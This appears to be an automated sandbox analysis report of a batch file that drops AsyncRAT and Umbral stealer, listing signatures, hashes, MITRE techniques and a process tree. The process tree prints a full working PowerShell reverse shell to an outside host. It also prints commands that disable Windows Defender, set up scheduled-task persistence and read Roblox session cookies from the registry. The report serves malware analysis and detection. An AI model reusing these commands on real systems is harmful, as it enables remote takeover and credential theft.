asyncrat | b79c63a1f5777b977a48085de65f8041d1d6b2d5d569224b0f81b343578f1803

Analysis

max time kernel
990s
max time network
982s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2024 12:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

reverse shell.bat
Size

953B
MD5

a34e9091b3cb1b1fddb64dd1e6eafe8b
SHA1

73a9ce1190dbf81871d72cc98b7d81487bad17dc
SHA256

b79c63a1f5777b977a48085de65f8041d1d6b2d5d569224b0f81b343578f1803
SHA512

65391766927605aef01be482578b0f11fc9a9dfd0ee0b0a62ff1df6d07346a4b6d5a0d7409983f3fcd7b8a98e5376fd15bc8961b477be683e88ddf8e5619d0b7

Score

10^/10

asyncrat umbral default discovery execution rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Botnet

Default

technical-southwest.gl.at.ply.gg:58694

Attributes

delay
1
install
true
install_file
WINDOWS.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a000000023ba4-38.dat	family_umbral
behavioral1/memory/4356-47-0x000001841F430000-0x000001841F470000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000a000000023ba2-22.dat	family_asyncrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
6	4908	powershell.exe
29	4908	powershell.exe
32	4908	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4908	powershell.exe
3248	powershell.exe
1760	powershell.exe
3124	powershell.exe
4176	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Loader.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	output.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
4496	output.exe
4356	Loader.exe
4196	WINDOWS.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1164	cmd.exe
4212	PING.EXE

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2936	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3668	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4212	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1408	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4908	powershell.exe
4908	powershell.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
4496	output.exe
3248	powershell.exe
3248	powershell.exe
3248	powershell.exe
1760	powershell.exe
1760	powershell.exe
1760	powershell.exe
3124	powershell.exe
3124	powershell.exe
3124	powershell.exe
4112	powershell.exe
4112	powershell.exe
4112	powershell.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4176	powershell.exe
4176	powershell.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4196	WINDOWS.exe
4176	powershell.exe
4196	WINDOWS.exe
4196	WINDOWS.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4908	powershell.exe
Token: SeDebugPrivilege	4356	Loader.exe
Token: SeDebugPrivilege	4496	output.exe
Token: SeDebugPrivilege	4496	output.exe
Token: SeDebugPrivilege	3248	powershell.exe
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeIncreaseQuotaPrivilege	1340	wmic.exe
Token: SeSecurityPrivilege	1340	wmic.exe
Token: SeTakeOwnershipPrivilege	1340	wmic.exe
Token: SeLoadDriverPrivilege	1340	wmic.exe
Token: SeSystemProfilePrivilege	1340	wmic.exe
Token: SeSystemtimePrivilege	1340	wmic.exe
Token: SeProfSingleProcessPrivilege	1340	wmic.exe
Token: SeIncBasePriorityPrivilege	1340	wmic.exe
Token: SeCreatePagefilePrivilege	1340	wmic.exe
Token: SeBackupPrivilege	1340	wmic.exe
Token: SeRestorePrivilege	1340	wmic.exe
Token: SeShutdownPrivilege	1340	wmic.exe
Token: SeDebugPrivilege	1340	wmic.exe
Token: SeSystemEnvironmentPrivilege	1340	wmic.exe
Token: SeRemoteShutdownPrivilege	1340	wmic.exe
Token: SeUndockPrivilege	1340	wmic.exe
Token: SeManageVolumePrivilege	1340	wmic.exe
Token: 33	1340	wmic.exe
Token: 34	1340	wmic.exe
Token: 35	1340	wmic.exe
Token: 36	1340	wmic.exe
Token: SeIncreaseQuotaPrivilege	1340	wmic.exe
Token: SeSecurityPrivilege	1340	wmic.exe
Token: SeTakeOwnershipPrivilege	1340	wmic.exe
Token: SeLoadDriverPrivilege	1340	wmic.exe
Token: SeSystemProfilePrivilege	1340	wmic.exe
Token: SeSystemtimePrivilege	1340	wmic.exe
Token: SeProfSingleProcessPrivilege	1340	wmic.exe
Token: SeIncBasePriorityPrivilege	1340	wmic.exe
Token: SeCreatePagefilePrivilege	1340	wmic.exe
Token: SeBackupPrivilege	1340	wmic.exe
Token: SeRestorePrivilege	1340	wmic.exe
Token: SeShutdownPrivilege	1340	wmic.exe
Token: SeDebugPrivilege	1340	wmic.exe
Token: SeSystemEnvironmentPrivilege	1340	wmic.exe
Token: SeRemoteShutdownPrivilege	1340	wmic.exe
Token: SeUndockPrivilege	1340	wmic.exe
Token: SeManageVolumePrivilege	1340	wmic.exe
Token: 33	1340	wmic.exe
Token: 34	1340	wmic.exe
Token: 35	1340	wmic.exe
Token: 36	1340	wmic.exe
Token: SeIncreaseQuotaPrivilege	2292	wmic.exe
Token: SeSecurityPrivilege	2292	wmic.exe
Token: SeTakeOwnershipPrivilege	2292	wmic.exe
Token: SeLoadDriverPrivilege	2292	wmic.exe
Token: SeSystemProfilePrivilege	2292	wmic.exe
Token: SeSystemtimePrivilege	2292	wmic.exe
Token: SeProfSingleProcessPrivilege	2292	wmic.exe
Token: SeIncBasePriorityPrivilege	2292	wmic.exe
Token: SeCreatePagefilePrivilege	2292	wmic.exe
Token: SeBackupPrivilege	2292	wmic.exe
Token: SeRestorePrivilege	2292	wmic.exe
Token: SeShutdownPrivilege	2292	wmic.exe
Token: SeDebugPrivilege	2292	wmic.exe
Token: SeSystemEnvironmentPrivilege	2292	wmic.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 4248 wrote to memory of 4908	4248	cmd.exe	83
PID 4248 wrote to memory of 4908	4248	cmd.exe	83
PID 4908 wrote to memory of 4496	4908	powershell.exe	92
PID 4908 wrote to memory of 4496	4908	powershell.exe	92
PID 4908 wrote to memory of 4356	4908	powershell.exe	94
PID 4908 wrote to memory of 4356	4908	powershell.exe	94
PID 4356 wrote to memory of 4308	4356	Loader.exe	95
PID 4356 wrote to memory of 4308	4356	Loader.exe	95
PID 4496 wrote to memory of 3112	4496	output.exe	97
PID 4496 wrote to memory of 3112	4496	output.exe	97
PID 4496 wrote to memory of 3212	4496	output.exe	99
PID 4496 wrote to memory of 3212	4496	output.exe	99
PID 4356 wrote to memory of 3248	4356	Loader.exe	101
PID 4356 wrote to memory of 3248	4356	Loader.exe	101
PID 3112 wrote to memory of 1408	3112	cmd.exe	103
PID 3112 wrote to memory of 1408	3112	cmd.exe	103
PID 3212 wrote to memory of 2936	3212	cmd.exe	104
PID 3212 wrote to memory of 2936	3212	cmd.exe	104
PID 4356 wrote to memory of 1760	4356	Loader.exe	105
PID 4356 wrote to memory of 1760	4356	Loader.exe	105
PID 4356 wrote to memory of 3124	4356	Loader.exe	107
PID 4356 wrote to memory of 3124	4356	Loader.exe	107
PID 4356 wrote to memory of 4112	4356	Loader.exe	109
PID 4356 wrote to memory of 4112	4356	Loader.exe	109
PID 3212 wrote to memory of 4196	3212	cmd.exe	111
PID 3212 wrote to memory of 4196	3212	cmd.exe	111
PID 4356 wrote to memory of 1340	4356	Loader.exe	112
PID 4356 wrote to memory of 1340	4356	Loader.exe	112
PID 4356 wrote to memory of 2292	4356	Loader.exe	114
PID 4356 wrote to memory of 2292	4356	Loader.exe	114
PID 4356 wrote to memory of 1872	4356	Loader.exe	116
PID 4356 wrote to memory of 1872	4356	Loader.exe	116
PID 4356 wrote to memory of 4176	4356	Loader.exe	118
PID 4356 wrote to memory of 4176	4356	Loader.exe	118
PID 4356 wrote to memory of 3668	4356	Loader.exe	120
PID 4356 wrote to memory of 3668	4356	Loader.exe	120
PID 4356 wrote to memory of 1164	4356	Loader.exe	122
PID 4356 wrote to memory of 1164	4356	Loader.exe	122
PID 1164 wrote to memory of 4212	1164	cmd.exe	124
PID 1164 wrote to memory of 4212	1164	cmd.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4308	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\reverse shell.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile -ExecutionPolicy Bypass -Command "$LHOST = 'radio-ebay.gl.at.ply.gg'; $LPORT = 10404; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) } catch { $_ }; $StreamWriter.Write('$Output`n'); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4908
- - C:\Users\Admin\Desktop\output.exe
    "C:\Users\Admin\Desktop\output.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4496
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3112
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBF1A.tmp.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3212
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2936
    - - C:\Users\Admin\AppData\Roaming\WINDOWS.exe
        
        "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4196
- - C:\Users\Admin\Desktop\Loader.exe
    "C:\Users\Admin\Desktop\Loader.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4356
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\Desktop\Loader.exe"
      4⤵
      Views/modifies file attributes
      PID:4308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Loader.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4112
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1340
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2292
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:1872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4176
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3668
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\Loader.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:1164
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
985b3105d8889886d6fd953575c54e08

SHA1
0f9a041240a344d82bac0a180520e7982c15f3cd

SHA256
5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

SHA512
0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
438dca7eeb55d273616d0252451e4363

SHA1
5a36cdaa9f3315b6002316dbe0793e6b72558fe7

SHA256
621e3bb74323c1c1bc1d5d7bd2fdbc792f1bd5f7e870272b58159fe494ce8aa0

SHA512
fedbe6f63e51ea0440954ae187b3f991db380dc4d60d52a879263c10fcb94c58cd94084e86d0f84da6edb1a7506819b7aa0f660c2b8fc631c68a435f50d72ff4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgzutndz.igs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBF1A.tmp.bat

Filesize
151B

MD5
653e5a6f73e083e383b443b797188f07

SHA1
8334dad6f86df66c243178b0553d3a2c066cd8df

SHA256
d03b1575e4bf4d27af8ea9547d6bb7944dd3524b504c0f875ff4957e6c80a8c4

SHA512
0179ce9fbb291f469268402aa7a797633f5385c27141d857acc4c89edb25ad606ffc32a932f62bc64cdff1be0f69478a1fd24a19d6997c3f60582b30b2dbbada

Download Submit
C:\Users\Admin\Desktop\Loader.exe

Filesize
229KB

MD5
1e10af7811808fc24065f18535cf1220

SHA1
65995bcb862aa66988e1bb0dbff75dcac9b400c7

SHA256
e07fd0ac793b06603be164c9ee73465af512cf17bed07614cbcd2a8410f04eed

SHA512
f1c623918a3701254805e7648d671b316446a0f98637d3de62d44331cf91502afb57ccb762472491bc4ac037fbf5f7b624eb9d39092b3be0b2ed84da6f3acadc

Download Submit
C:\Users\Admin\Desktop\output.exe

Filesize
63KB

MD5
7ceb11ebb7a55e33a82bc3b66f554e79

SHA1
8dfd574ad06ded662d92d81b72f14c1914ac45b5

SHA256
aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

SHA512
d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

Download Submit
memory/4356-82-0x000001841F8F0000-0x000001841F90E000-memory.dmp

Filesize
120KB

Download
memory/4356-81-0x0000018421210000-0x0000018421260000-memory.dmp

Filesize
320KB

Download
memory/4356-146-0x00007FFA1ADC0000-0x00007FFA1B881000-memory.dmp

Filesize
10.8MB

Download
memory/4356-47-0x000001841F430000-0x000001841F470000-memory.dmp

Filesize
256KB

Download
memory/4356-48-0x00007FFA1ADC0000-0x00007FFA1B881000-memory.dmp

Filesize
10.8MB

Download
memory/4356-120-0x0000018439BA0000-0x0000018439BB2000-memory.dmp

Filesize
72KB

Download
memory/4356-119-0x000001841F940000-0x000001841F94A000-memory.dmp

Filesize
40KB

Download
memory/4356-80-0x0000018439C00000-0x0000018439C76000-memory.dmp

Filesize
472KB

Download
memory/4496-32-0x00007FFA1ADC0000-0x00007FFA1B881000-memory.dmp

Filesize
10.8MB

Download
memory/4496-53-0x00007FFA1ADC0000-0x00007FFA1B881000-memory.dmp

Filesize
10.8MB

Download
memory/4496-31-0x0000000000BB0000-0x0000000000BC6000-memory.dmp

Filesize
88KB

Download
memory/4908-13-0x00007FFA1ADC3000-0x00007FFA1ADC5000-memory.dmp

Filesize
8KB

Download
memory/4908-0-0x00007FFA1ADC3000-0x00007FFA1ADC5000-memory.dmp

Filesize
8KB

Download
memory/4908-12-0x00007FFA1ADC0000-0x00007FFA1B881000-memory.dmp

Filesize
10.8MB

Download
memory/4908-11-0x00007FFA1ADC0000-0x00007FFA1B881000-memory.dmp

Filesize
10.8MB

Download
memory/4908-14-0x00007FFA1ADC0000-0x00007FFA1B881000-memory.dmp

Filesize
10.8MB

Download
memory/4908-15-0x00007FFA1ADC0000-0x00007FFA1B881000-memory.dmp

Filesize
10.8MB

Download
memory/4908-1-0x000001C3FF2F0000-0x000001C3FF312000-memory.dmp

Filesize
136KB

Download
memory/4908-139-0x00007FFA1ADC0000-0x00007FFA1B881000-memory.dmp

Filesize
10.8MB

Download
memory/4908-16-0x00007FFA1ADC0000-0x00007FFA1B881000-memory.dmp

Filesize
10.8MB

Download